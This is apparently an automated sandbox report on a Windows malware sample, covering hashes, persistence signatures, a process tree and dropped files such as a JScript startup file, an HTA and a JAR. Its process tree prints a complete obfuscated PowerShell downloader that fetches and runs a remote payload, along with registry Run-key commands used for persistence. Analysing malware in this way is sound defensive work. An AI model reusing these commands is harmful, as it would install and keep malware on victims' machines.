df15669f7f948abd95d1a4c326aa0443f0cc534513b253accff8bd2549a3f3dc

Analysis

max time kernel
1s
max time network
141s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
21-03-2023 04:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe
Size

451KB
MD5

8eb05c68a5880d8f15fa787b02192709
SHA1

45813931de14ac2f4f66d412caf9cf6fd236c5c5
SHA256

df15669f7f948abd95d1a4c326aa0443f0cc534513b253accff8bd2549a3f3dc
SHA512

231d122c647684386399ebe117189f1d784f89ae127fb41a061b6d43bec94c7d9cda0f13b6a4ad7f1ad233177f9df43a11c6040180653bf592ee39d3e74708b3
SSDEEP

12288:BjKiWwykMpBMs3qLVmNwCIWaONK6ezkf4BBe/wKA3JIOb2:Bj5bMpf6L2wzWnW38zA3Zi

Score

7^/10

persistence

Malware Config

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.Certificates.Windows.js	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.Certificates.Windows.js	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
268	sfvip player.exe

Loads dropped DLL 1 IoCs

pid	Process
844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\System.Certificates.Windows.js\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\System.Certificates.Windows.js\""	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
328	268	WerFault.exe	32

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 844 wrote to memory of 472	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	28
PID 844 wrote to memory of 472	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	28
PID 844 wrote to memory of 472	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	28
PID 844 wrote to memory of 472	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	28
PID 844 wrote to memory of 548	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	29
PID 844 wrote to memory of 548	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	29
PID 844 wrote to memory of 548	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	29
PID 844 wrote to memory of 548	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	29
PID 844 wrote to memory of 752	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	30
PID 844 wrote to memory of 752	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	30
PID 844 wrote to memory of 752	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	30
PID 844 wrote to memory of 752	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	30
PID 844 wrote to memory of 948	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	31
PID 844 wrote to memory of 948	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	31
PID 844 wrote to memory of 948	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	31
PID 844 wrote to memory of 948	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	31
PID 844 wrote to memory of 268	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	32
PID 844 wrote to memory of 268	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	32
PID 844 wrote to memory of 268	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	32
PID 844 wrote to memory of 268	844	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	32
PID 472 wrote to memory of 1036	472	WScript.exe	33
PID 472 wrote to memory of 1036	472	WScript.exe	33
PID 472 wrote to memory of 1036	472	WScript.exe	33
PID 472 wrote to memory of 1036	472	WScript.exe	33

C:\Users\Admin\AppData\Local\Temp\DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe
"C:\Users\Admin\AppData\Local\Temp\DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:844
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\System.VBS"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\ProgramData\rrrrrrrr.ps1"
    3⤵
    PID:1036
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\System.Certificates.Windows.js"
  2⤵
  - Drops startup file
  - Adds Run key to start application
  PID:548
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Java.hta"
  2⤵
  PID:752
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ibNAikPWwgtnt($kyIUfjlo, $JTcfKfOUuo){[IO.File]::WriteAllBytes($kyIUfjlo, $JTcfKfOUuo)};function YczpVHAtPXfA($kyIUfjlo){if($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45137,45145,45145))) -eq $True){rundll32.exe $kyIUfjlo }elseif($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45149,45152,45086))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $kyIUfjlo}elseif($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45146,45152,45142))) -eq $True){misexec /qn /i $kyIUfjlo}else{Start-Process $kyIUfjlo}};function ngDXZIlVXFBC($BsVKuudAUmTO){$JJdfgEaJRGBrY = New-Object (pxzGFEDn @(45115,45138,45153,45083,45124,45138,45135,45104,45145,45142,45138,45147,45153));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JTcfKfOUuo = $JJdfgEaJRGBrY.DownloadData($BsVKuudAUmTO);return $JTcfKfOUuo};function pxzGFEDn($bQNW){$fVJWcyxb=45037;$oMKbCTAMoNPeFo=$Null;foreach($TerlvqdlS in $bQNW){$oMKbCTAMoNPeFo+=[char]($TerlvqdlS-$fVJWcyxb)};return $oMKbCTAMoNPeFo};function dPepQKsgLgDssQ(){$iOnAfkNBjQqBeerCG = $env:AppData + '\';$eLfUXisvXwHcf = $iOnAfkNBjQqBeerCG + 'wcqvss.com';If(Test-Path -Path $eLfUXisvXwHcf){Invoke-Item $eLfUXisvXwHcf;}Else{ $xlPtaPUVuQAAoD = ngDXZIlVXFBC (pxzGFEDn @(45141,45153,45153,45149,45152,45095,45084,45084,45139,45142,45145,45138,45152,45083,45136,45134,45153,45135,45148,45157,45083,45146,45148,45138,45084,45156,45136,45150,45155,45152,45152,45083,45136,45148,45146));ibNAikPWwgtnt $eLfUXisvXwHcf $xlPtaPUVuQAAoD;Invoke-Item $eLfUXisvXwHcf;};powershell -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded echo 123;;;;}dPepQKsgLgDssQ;
    3⤵
    PID:1096
- C:\Program Files\Java\jre7\bin\javaw.exe
  "C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Java Certificates.jar"
  2⤵
  PID:948
- C:\Users\Admin\AppData\Roaming\sfvip player.exe
  "C:\Users\Admin\AppData\Roaming\sfvip player.exe"
  2⤵
  - Executes dropped EXE
  PID:268
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 268 -s 660
    3⤵
    - Program crash
    PID:328

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Java Certificates.jar

Filesize
92KB

MD5
40ce31653e4038c1bfa3ee12c721d71d

SHA1
4c5057decb82f5338aab304088521a3e977786b0

SHA256
661c4f08bf45f798dea332d2ba1583ef232e98281350f1ffeefd5b43ae0551ec

SHA512
ea15a8025e7d6dc59bbfeb80b1ee8529c5c82cafddffe1954c3906d575e252c4a7e2045bf33ef7ce37c9a4f4d7ed1acc17926c13bb585b99ce3a5c9eabfe5f97

Download Submit
C:\Users\Admin\AppData\Roaming\Java.hta

Filesize
10KB

MD5
06f39cb0a617f9bba5b8bc829697dd72

SHA1
33cd123eee708c733de4f6e37ea78d825ab5183f

SHA256
53dcfe19a536f3965296b2e49fa1f936c90fa2b99b06e71cc00beedadbdfaa97

SHA512
9f4059679a16938a8f03b168e7931ba2514c2772a7340ba667315ebc1a3b8c24c5b3c749fc57f85bf3872c0b73b7a3a3766b9e86c367e2340865f0797e65349a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RPLRNOA4ACA8NPZS9Q9K.temp

Filesize
7KB

MD5
d818fd0ae780ec91847f926b7f0e0835

SHA1
58de1d5ca1b2256044692fbc22c886c5573d0577

SHA256
94083e662eb07fb9db6852257b2fc1dd230961d86e4abf30885a3b089e3745e4

SHA512
4c835abffce7b018a3a893eaea8ddef8fb3c06ac2cf1040e82bc4cf7716582b497419521d6feaa856401f837ad983d921cfa38dc98561d5eeb7c651ddeb37531

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d818fd0ae780ec91847f926b7f0e0835

SHA1
58de1d5ca1b2256044692fbc22c886c5573d0577

SHA256
94083e662eb07fb9db6852257b2fc1dd230961d86e4abf30885a3b089e3745e4

SHA512
4c835abffce7b018a3a893eaea8ddef8fb3c06ac2cf1040e82bc4cf7716582b497419521d6feaa856401f837ad983d921cfa38dc98561d5eeb7c651ddeb37531

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.Certificates.Windows.js

Filesize
475KB

MD5
3d2ce2ef6ed51c9b9b9eb490f7b6f7f0

SHA1
d8a147081fb7ce7561481df34aacafb2680f4bf2

SHA256
ae3b73102a4b1317a046c39def44e36821c40d1f07b1ae7db09232c2cb3052c1

SHA512
d008cdacb38ba84095c9cb2e97c95534a15cb98192c070e152571afad62010c807bb451666e47e21b202d77fb26564f01773e4bbf35bcc32e99d84cb431273b5

Download Submit
C:\Users\Admin\AppData\Roaming\System.Certificates.Windows.js

Filesize
475KB

MD5
3d2ce2ef6ed51c9b9b9eb490f7b6f7f0

SHA1
d8a147081fb7ce7561481df34aacafb2680f4bf2

SHA256
ae3b73102a4b1317a046c39def44e36821c40d1f07b1ae7db09232c2cb3052c1

SHA512
d008cdacb38ba84095c9cb2e97c95534a15cb98192c070e152571afad62010c807bb451666e47e21b202d77fb26564f01773e4bbf35bcc32e99d84cb431273b5

Download Submit
C:\Users\Admin\AppData\Roaming\System.VBS

Filesize
984B

MD5
9d848c9972c6a431b81a38a9c184ea2b

SHA1
027939ca3d01ac4f7bde80381ba9f4dd8e1ac281

SHA256
6d1ca16b766a343630f954fff0e5ca159d82e55ffc197d4d2e23e71c8a61f4d3

SHA512
fbdbfed4a779713e0f9324b082ad9462afb03e7ba97aad1357ec3f615e757a8eec2b4700d59a6f17a3f408b0478a88e5d54e374d885db4cf4d2120784b2a7163

Download Submit
C:\Users\Admin\AppData\Roaming\sfvip player.exe

Filesize
802KB

MD5
9cd16366ca3486523fcbbda63bc8c16b

SHA1
6f773925b546c0e5ff76b7ef29d0671033b53cfe

SHA256
21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

SHA512
f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

Download Submit
C:\Users\Admin\AppData\Roaming\sfvip player.exe

Filesize
802KB

MD5
9cd16366ca3486523fcbbda63bc8c16b

SHA1
6f773925b546c0e5ff76b7ef29d0671033b53cfe

SHA256
21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

SHA512
f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

Download Submit
\Users\Admin\AppData\Roaming\sfvip player.exe

Filesize
802KB

MD5
9cd16366ca3486523fcbbda63bc8c16b

SHA1
6f773925b546c0e5ff76b7ef29d0671033b53cfe

SHA256
21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

SHA512
f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

Download Submit
\Users\Admin\AppData\Roaming\sfvip player.exe

Filesize
802KB

MD5
9cd16366ca3486523fcbbda63bc8c16b

SHA1
6f773925b546c0e5ff76b7ef29d0671033b53cfe

SHA256
21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

SHA512
f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

Download Submit
\Users\Admin\AppData\Roaming\sfvip player.exe

Filesize
802KB

MD5
9cd16366ca3486523fcbbda63bc8c16b

SHA1
6f773925b546c0e5ff76b7ef29d0671033b53cfe

SHA256
21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

SHA512
f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

Download Submit
\Users\Admin\AppData\Roaming\sfvip player.exe

Filesize
802KB

MD5
9cd16366ca3486523fcbbda63bc8c16b

SHA1
6f773925b546c0e5ff76b7ef29d0671033b53cfe

SHA256
21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

SHA512
f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

Download Submit
\Users\Admin\AppData\Roaming\sfvip player.exe

Filesize
802KB

MD5
9cd16366ca3486523fcbbda63bc8c16b

SHA1
6f773925b546c0e5ff76b7ef29d0671033b53cfe

SHA256
21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

SHA512
f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

Download Submit
\Users\Admin\AppData\Roaming\sfvip player.exe

Filesize
802KB

MD5
9cd16366ca3486523fcbbda63bc8c16b

SHA1
6f773925b546c0e5ff76b7ef29d0671033b53cfe

SHA256
21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

SHA512
f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

Download Submit
memory/268-77-0x00000000001C0000-0x000000000028E000-memory.dmp

Filesize
824KB

Download
memory/948-95-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/1036-90-0x00000000023B0000-0x00000000023F0000-memory.dmp

Filesize
256KB

Download
memory/1096-96-0x0000000002850000-0x0000000002890000-memory.dmp

Filesize
256KB

Download